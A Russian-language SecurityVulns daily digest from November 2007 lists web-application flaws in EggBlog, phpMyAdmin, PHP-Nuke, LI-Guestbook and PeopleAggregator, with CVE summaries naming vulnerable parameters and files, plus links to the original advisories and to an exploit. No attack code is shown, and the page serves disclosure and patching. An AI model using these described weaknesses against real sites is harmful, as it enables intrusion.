Информационная безопасность
[RU] switch to English


Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
Опубликовано:12 ноября 2007 г.
Источник:
SecurityVulns ID:8329
Тип:удаленная
Уровень опасности:
5/10
Описание:Инъекции PHP, инъекции SQL, обратный путь в каталогах, межсайтовый скриптинг, утечка информации и т.д.
Затронутые продукты:EGGBLOG : EggBlog 3.1
 PHPMYADMIN : phpMyAdmin 2.11
 PHPNUK : PHP-Nuke 8.1
 LISCRIPTS : LI-Guestbook 1.2
 PEOPLEAGGREGATOR : PeopleAggregator 1.2
CVE:CVE-2007-5631 (Multiple PHP remote file inclusion vulnerabilities in PeopleAggregator 1.2pre6 allow remote attackers to execute arbitrary PHP code via a URL in the current_blockmodule_path parameter to (1) AudiosMediaGalleryModule/AudiosMediaGalleryModule.php, (2) ImagesMediaGalleryModule/ImagesMediaGalleryModule.php, (3) MembersFacewallModule/MembersFacewallModule.php, (4) NewestGroupsModule/NewestGroupsModule.php, (5) UploadMediaModule/UploadMediaModule.php, and (6) VideosMediaGalleryModule/VideosMediaGalleryModule.php in BetaBlockModules/; and (7) the path_prefix parameter to several components.)
 CVE-2007-5589 (Muliple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.11.1.2 allow remote attackers to inject arbitrary web script or HTML via certain input available in (1) PHP_SELF in (a) server_status.php, and (b) grab_globals.lib.php, (c) display_change_password.lib.php, and (d) common.lib.php in libraries/; and certain input available in PHP_SELF and (2) PATH_INFO in libraries/common.inc.php. NOTE: there might also be other vectors related to (3) REQUEST_URI.)
 CVE-2007-5386 (Cross-site scripting (XSS) vulnerability in scripts/setup.php in phpMyAdmin 2.11.1, when accessed by a browser that does not URL-encode requests, allows remote attackers to inject arbitrary web script or HTML via the query string.)
 CVE-2007-3694
Оригинальный текстdocumentphil_(at)_broadbandmechanics.com, PeopleAggregatory security advisory - re CVE-2007-5631 (12.11.2007)
 documentGuns_(at)_0x90.com.ar, PHP-Nuke Module Advertising Blind SQL Injection (12.11.2007)
 documentmesut_(at)_h-labs.org, Eggblog v3.1.0 XSS Vulnerability (12.11.2007)
 documentAdvisory_(at)_Aria-Security.net, Aria-Security.Net Research: Rapid Classified HotList Image (12.11.2007)
 documentHanno Bock, [Full-disclosure] CVE-2007-3694: Cross site scripting (XSS) in broadcast machine (12.11.2007)
 documentdrakomo_(at)_gmail.com, SQL injection bug found in TBSource. (12.11.2007)
 documentroot_(at)_hanicker.it, xoops mylinks module - sql injection (12.11.2007)
 documentabc.seo_(at)_gmail.com, li-guestbook sql inj (12.11.2007)
 documentDEBIAN, [SECURITY] [DSA 1403-1] New phpmyadmin packages fix cross-site scripting (12.11.2007)
 documentAdvisory_(at)_Aria-Security.net, Aria-Security.Net Research: Lotfian BROCHURE Management System (12.11.2007)
 documentMustLive, Vulnerability in PHP-Nuke captcha (12.11.2007)
Файлы:Exploits PHP-Nuke Module Advertising Blind SQL Injection

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород